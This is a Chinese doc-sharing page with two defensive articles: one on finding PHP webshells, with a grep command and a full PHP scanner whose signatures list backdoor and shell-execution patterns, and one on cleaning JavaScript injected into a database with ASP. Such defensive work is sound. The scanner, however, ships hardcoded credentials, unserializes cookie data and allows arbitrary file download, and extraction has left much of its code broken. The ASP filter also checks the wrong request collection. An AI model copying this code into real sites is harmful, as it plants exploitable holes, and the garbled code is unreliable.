具体⽅法如下:在linux中我们可以使⽤命令来搜查⽊马⽂件,到代码安装⽬录执⾏下⾯命令复制代码代码如下:find ./ -iname "*.php" | xargs grep -H -n "eval(base64_decode"搜出来接近100条结果,这个结果列表很重要,⽊马都在⾥⾯,要⼀个⼀个⽂件打开验证是否是⽊马,如果是,马上删除掉最后找到10个⽊马⽂件,存放在各种⽬录,都是php webshell,功能很齐全,⽤base64编码如果你在windows中查找⽬录直接使⽤windows⽂件搜索就可以了,可以搜索eval或最近修改⽂件,然后如果是dedecms我们要查看最新dedecms漏洞呀然后修补。
下⾯给个php⽊马查找⼯具,直接放到你站点根⽬录复制代码代码如下:<?php/**************PHP Web⽊马扫描器************************//* [+] 作者: alibaba *//*[+]MSN:**********************//* [+] ⾸发: , 转载请注明t00ls *//* [+] 版本: v1.0 *//* [+] 功能: web版php⽊马扫描⼯具*//* [+] 注意: 扫描出来的⽂件并不⼀定就是后门, *//* 请⾃⾏判断、审核、对⽐原⽂件。
*//* 如果你不确定扫出来的⽂件是否为后门,*//* 欢迎你把该⽂件发给我进⾏分析。
*//*******************************************************/ob_start();set_time_limit(0);$username = "t00ls"; //设置⽤户名$password = "t00ls"; //设置密码$md5 = md5(md5($username).md5($password));$version = "PHP Web⽊马扫描器v1.0";PHP Web ⽊马扫描器$realpath = realpath('./');$selfpath = $_SERVER['PHP_SELF'];$selfpath = substr($selfpath, 0, strrpos($selfpath,'/'));define('REALPATH', str_replace('//','/',str_replace('\','/',substr($realpath, 0, strlen($realpath) - strlen($selfpath)))));define('MYFILE', basename(__FILE__));define('MYPATH', str_replace('\', '/', dirname(__FILE__)).'/');define('MYFULLPATH', str_replace('\', '/', (__FILE__)));define('HOST', "http://".$_SERVER['HTTP_HOST']);><html><head><title><?php echo $version?></title><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><style>body{margin:0px;}body,td{font: 12px Arial,Tahoma;line-height: 16px;}a {color: #00f;text-decoration:underline;}a:hover{color: #f00;text-decoration:none;}.alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 10px 5px 5px;}.alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f9f9f9;padding:5px 10px 5px 5px;}.focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 10px 5px 5px;}.head td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 10px 5px 5px;font-weight:bold;}.head td span{font-weight:normal;}</style></head><body><?phpif(!(isset($_COOKIE['t00ls']) && $_COOKIE['t00ls'] == $md5) && !(isset($_POST['username']) && isset($_POST['password']) &&(md5(md5($_POST['username']).md5($_POST['password']))==$md5))){echo '<form id="frmlogin" name="frmlogin" method="post" action="">⽤户名: <input type="text" name="username" id="username" /> 密码: <inputtype="password" name="password" id="password" /> <input type="submit" name="btnLogin" id="btnLogin" value="登陆" /></form>';}elseif(isset($_POST['username']) && isset($_POST['password']) && (md5(md5($_POST['username']).md5($_POST['password']))==$md5)){setcookie("t00ls", $md5, time()+60*60*24*365,"/");echo "登陆成功!";header( 'refresh: 1; url='.MYFILE.'?action=scan' );}else{setcookie("t00ls", $md5, time()+60*60*24*365,"/");$setting = getSetting();$action = isset($_GET['action'])?$_GET['action']:"";if($action=="logout"){setcookie ("t00ls", "", time() - 3600);Header("Location: ".MYFILE);exit();}if($action=="download" && isset($_GET['file']) && trim($_GET['file'])!=""){$file = $_GET['file'];ob_clean();if (@file_exists($file)) {header("Content-type: application/octet-stream");header("Content-Disposition: filename="".basename($file).""");echo file_get_contents($file);}exit();}><table border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr class="head"><td><?php echo $_SERVER['SERVER_ADDR']?><span style="float: right; font-weight:bold;"><?php echo "<ahref='/'>$version</a>"?></span></td></tr><tr class="alt1"><td><span style="float: right;"><?=date("Y-m-d H:i:s",mktime())?></span><a href="?action=scan">扫描</a> |<a href="?action=setting">设定</a> |<a href="?action=logout">登出</a></td></tr></tbody></table><br><?phpif($action=="setting"){if(isset($_POST['btnsetting'])){$Ssetting = array();$Ssetting['user']=isset($_POST['checkuser'])?$_POST['checkuser']:"php | php? | phtml";$Ssetting['all']=isset($_POST['checkall'])&&$_POST['checkall']=="on"?1:0;$Ssetting['hta']=isset($_POST['checkhta'])&&$_POST['checkhta']=="on"?1:0;setcookie("t00ls_s", base64_encode(serialize($Ssetting)), time()+60*60*24*365,"/");echo "设置完成!";header( 'refresh: 1; url='.MYFILE.'?action=setting' );exit();}><form name="frmSetting" method="post" action="?action=setting"><FIELDSET style="width:400px"><LEGEND>扫描设定</LEGEND><table width="100%" border="0" cellspacing="0" cellpadding="0"><tr><td width="60">⽂件后缀:</td><td width="300"><input type="text" name="checkuser" id="checkuser" style="width:300px;" value="<?php echo $setting['user']?>"></td> </tr><tr><td><label for="checkall">所有⽂件</label></td><td><input type="checkbox" name="checkall" id="checkall" <?php if($setting['all']==1) echo "checked"?>></td></tr><tr><td><label for="checkhta">设置⽂件</label></td><td><input type="checkbox" name="checkhta" id="checkhta" <?php if($setting['hta']==1) echo "checked"?>></td></tr><tr><td> </td><td><input type="submit" name="btnsetting" id="btnsetting" value="提交"></td><?php}else{$dir = isset($_POST['path'])?$_POST['path']:MYPATH;$dir = substr($dir,-1)!="/"?$dir."/":$dir;><form name="frmScan" method="post" action=""><table width="100%%" border="0" cellspacing="0" cellpadding="0"><tr><td width="35" style="vertical-align:middle; padding-left:5px;">扫描路径:</td><td width="690"><input type="text" name="path" id="path" style="width:600px" value="<?php echo $dir?>"> <input type="submit" name="btnScan" id="btnScan" value="开始扫描"></td></tr></table()></form><?phpif(isset($_POST['btnScan'])){$start=mktime();$is_user = array();$is_ext = "";$list = "";if(trim($setting['user'])!=""){$is_user = explode("|",$setting['user']);if(count($is_user)>0){foreach($is_user as $key=>$value)$is_user[$key]=trim(str_replace("?","(.)",$value));$is_ext = "(.".implode("($|.))|(.",$is_user)."($|.))";}}if($setting['hta']==1){$is_hta=1;$is_ext = strlen($is_ext)>0?$is_ext."|":$is_ext;$is_ext.="(^.htaccess$)";}if($setting['all']==1 || (strlen($is_ext)==0 && $setting['hta']==0)){$is_ext="(.+)";}$php_code = getCode();if(!is_readable($dir))$dir = MYPATH;$count=$scanned=0;scan($dir,$is_ext);$end=mktime();$spent = ($end - $start);><div style="padding:10px; background-color:#ccc">扫描: <?php echo $scanned?> ⽂件| 发现: <?php echo $count?> 可疑⽂件| 耗时: <?php echo $spent? > 秒</div><table width="100%" border="0" cellspacing="0" cellpadding="0"><tr class="head"><td width="15" align="center">No.</td><td width="48%">⽂件</td><td width="12%">更新时间</td><td width="10%">原因</td><td width="20%">特征</td><td>动作</td></tr><?php echo $list?></table><?php}}}ob_flush();function scan($path = '.',$is_ext){global $php_code,$count,$scanned,$list;$ignore = array('.', '..' );$replace=array(" ","n","r","t");$dh = @opendir( $path );while(false!==($file=readdir($dh))){if( !in_array( $file, $ignore ) ){if( is_dir( "$path$file" ) ){scan("$path$file/",$is_ext);} else {$current = $path.$file;if(MYFULLPATH==$current) continue;if(!preg_match("/$is_ext/i",$file)) continue;if(is_readable($current)){$scanned++;$content=file_get_contents($current);$content= str_replace($replace,"",$content);foreach($php_code as $key => $value){if(preg_match("/$value/i",$content)){$count++;$j = $count % 2 + 1;$filetime = date('Y-m-d H:i:s',filemtime($current));$reason = explode("->",$key);$url = str_replace(REALPATH,HOST,$current);preg_match("/$value/i",$content,$arr);$list.="<tr class='alt$j' onmouseover='this.className="focus";' onmouseout='this.className="alt$j";'> <td>$count</td><td><a href='$url' target='_blank'>$current</a></td><td>$filetime</td><td><font color=red>$reason[0]</font></td><td><font color=#090>$reason[1]</font></td><td><a href='?action=download&file=$current' target='_blank'>下载</a></td></tr>";//echo $key . "-" . $path . $file ."(" . $arr[0] . ")" ."<br />";//echo $path . $file ."<br />";break;}}}}}}closedir( $dh );}function getSetting(){$Ssetting = array();if(isset($_COOKIE['t00ls_s'])){$Ssetting = unserialize(base64_decode($_COOKIE['t00ls_s']));$Ssetting['user']=isset($Ssetting['user'])?$Ssetting['user']:"php | php? | phtml | shtml"; $Ssetting['all']=isset($Ssetting['all'])?intval($Ssetting['all']):0;$Ssetting['hta']=isset($Ssetting['hta'])?intval($Ssetting['hta']):1;}else{$Ssetting['user']="php | php? | phtml | shtml";$Ssetting['all']=0;$Ssetting['hta']=1;setcookie("t00ls_s", base64_encode(serialize($Ssetting)), time()+60*60*24*365,"/");}return $Ssetting;}function getCode(){return array('后门特征->'=>'','后门特征->c99shell'=>'c99shell','后门特征->phpspy'=>'phpspy','后门特征->Scanners'=>'Scanners','后门特征->cmd.php'=>'cmd.php','后门特征->str_rot13'=>'str_rot13','后门特征->webshell'=>'webshell','后门特征->EgY_SpIdEr'=>'EgY_SpIdEr','后门特征->'=>'','后门特征->SECFORCE'=>'SECFORCE','后门特征->eval("?>'=>'eval(('|")?>','可疑代码特征->system('=>'system(','可疑代码特征->passthru('=>'passthru(','可疑代码特征->shell_exec('=>'shell_exec(','可疑代码特征->exec('=>'exec(','可疑代码特征->popen('=>'popen(','可疑代码特征->proc_open'=>'proc_open','可疑代码特征->eval($'=>'eval(('|"|s*)\$','可疑代码特征->assert($'=>'assert(('|"|s*)\$','危险MYSQL代码->returns string soname'=>'returnsstringsoname','危险MYSQL代码->into outfile'=>'intooutfile','危险MYSQL代码->load_file'=>'select(s+)(.*)load_file','加密后门特征->eval(gzinflate('=>'eval(gzinflate(','加密后门特征->eval(base64_decode('=>'eval(base64_decode(','加密后门特征->eval(gzuncompress('=>'eval(gzuncompress(','加密后门特征->eval(gzdecode('=>'eval(gzdecode(','加密后门特征->eval(str_rot13('=>'eval(str_rot13(','加密后门特征->gzuncompress(base64_decode('=>'gzuncompress(base64_decode(','加密后门特征->base64_decode(gzuncompress('=>'base64_decode(gzuncompress(','⼀句话后门特征->eval($_'=>'eval(('|"|s*)\$_(POST|GET|REQUEST|COOKIE)','⼀句话后门特征->assert($_'=>'assert(('|"|s*)\$_(POST|GET|REQUEST|COOKIE)','⼀句话后门特征->require($_'=>'require(('|"|s*)\$_(POST|GET|REQUEST|COOKIE)','⼀句话后门特征->require_once($_'=>'require_once(('|"|s*)\$_(POST|GET|REQUEST|COOKIE)','⼀句话后门特征->include($_'=>'include(('|"|s*)\$_(POST|GET|REQUEST|COOKIE)','⼀句话后门特征->include_once($_'=>'include_once(('|"|s*)\$_(POST|GET|REQUEST|COOKIE)','⼀句话后门特征->call_user_func("assert"'=>'call_user_func(("|')assert("|')','⼀句话后门特征->call_user_func($_'=>'call_user_func(('|"|s*)\$_(POST|GET|REQUEST|COOKIE)','⼀句话后门特征->$_POST/GET/REQUEST/COOKIE[?]($_POST/GET/REQUEST/COOKIE[?]'=>'$_(POST|GET|REQUEST|COOKIE)[([^]]+)](('|"|s*)\$_(POST|GET|REQUEST|COOKIE)[','⼀句话后门特征->echo(file_get_contents($_POST/GET/REQUEST/COOKIE'=>'echo(file_get_contents(('|"|s*)\$_(POST|GET|REQUEST|COOKIE)','上传后门特征->file_put_contents($_POST/GET/REQUEST/COOKIE,$_POST/GET/REQUEST/COOKIE'=>'file_put_contents(('|"|s*)\$_(POST|GET|REQUEST|COOKIE) [([^]]+)],('|"|s*)\$_(POST|GET|REQUEST|COOKIE)','上传后门特征->fputs(fopen("?","w"),$_POST/GET/REQUEST/COOKIE['=>'fputs(fopen((.+),('|")w('|")),('|"|s*)\$_(POST|GET|REQUEST|COOKIE)[','.htaccess插马特征->SetHandler application/x-httpd-php'=>'SetHandlerapplication/x-httpd-php','.htaccess插马特征->php_value auto_prepend_file'=>'php_valueauto_prepend_file','.htaccess插马特征->php_value auto_append_file'=>'php_valueauto_append_file');}>希望本⽂所述对⼤家基于php的⽹站安全建设有所帮助。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
据库被挂马我相信很多人都碰到过。
在这里,我讲下我处理的方法。
相关文章:什么是电脑肉鸡?(新手应该知道)
第一步:为现有数据库做好备份。
第二步:
执行如下ASP文件,这样就可以去掉数据库当中的JS木马:
注:conn.asp自己去写了。
'这里放入JS木马内容:请记得改为自己数据库中的JS木马内容。
<!--#include file="conn.asp"-->
<%
Server.ScriptTimeOut=180
Set rstSchema = conn.OpenSchema(20)
k=1
Do Until rstSchema.EOF '遍历数据库表
If rstSchema("TABLE_TYPE")="TABLE" Then
response.write K&".<font color=red><b>"&rstSchema("TABLE_NAME") & "</b></font>:" '显示表名
Set rs=Server.CreateObject("ADODB.Recordset")
sql="select * from [" & rstSchema("TABLE_NAME")&"]"
rs.open sql,conn,1,3
For i=0 to rs.fields.count-1 '遍历表中字段
If int(rs(i).Type)=129 or int(rs(i).Type)=130 or
int(rs(i).Type)=200 or int(rs(i).Type)=201 or int(rs(i).Type)=202 or int(rs(i).Type)=203 Then'只处理字段类型为字符型的字段
conn.execute("update ["&rstSchema("TABLE_NAME")&"] set "&rs(i).name&" =replace(cast("&rs(i).name&" as varchar(8000)),'这里放入JS木马内容','')")
response.write rs(i).name &" "&rs(i).Type &" "'显示执行过的字段名。
End If
Next
response.write "<br>"
End If
rstSchema.MoveNext
k=k+1
Loop
response.Write "执行成功"
%>
如果数据库表很多的话,上面的遍历数据库结构未执行完就被IIS给停止了。
在这时候可以在
If rstSchema("TABLE_TYPE")="TABLE" Then
当中适当加入k值的范围,如:
If rstSchema("TABLE_TYPE")="TABLE" k>10 and k<20 Then
这样的话就一次只操作9个表。
第三步:
根据数据库JS注入的特性(会包括<script、</script>和http://这样的字符),在conn.asp里面放入如下代码:
Function Cheack_Sqljs()'防止数据库外链JS注入:true为发现外链JS注入。
Dim F_Post,F_Get
Cheack_Sqljs=False
If Request.Form<>"" Then'表单提交时的检测
For Each F_Post In Request.Form
If (Instr(LCase(Request.Form(F_Post)),"<script")<>0 or Instr(LCase(Request.Form(F_Post)),"</script>")<>0) and
Instr(LCase(Request.Form(F_Post)),"http://")<>0 Then
Cheack_Sqljs=True
Exit For
End If
Next
End If
If Request.QueryString<>"" Then'QueryString提交时的检测
For Each F_Get In Request.QueryString
If (Instr(LCase(Request.Form(F_Get)),"<script")<>0 or Instr(LCase(Request.Form(F_Get)),"</script>")<>0) and
Instr(LCase(Request.Form(F_Get)),"http://")<>0 Then
Cheack_Sqljs=True
Exit For
End If
Next
End If
End Function
Function CheckDataFrom()'检查提交数据来源:True为数据从站外提交过来的 CheckDataFrom=True
server_v1=Cstr(Request.ServerVariables("HTTP_REFERER"))
server_v2=Cstr(Request.ServerVariables("SERVER_NAME"))
if mid(server_v1,8,len(server_v2))<>server_v2 then
CheckDataFrom=False
end if
End Function
If Cheack_Sqljs or CheckDataFrom Then
Response.Write "<Script Language=JavaScript>alert('禁止执行,非法操作。
');</Script>"
Response.End()
End If。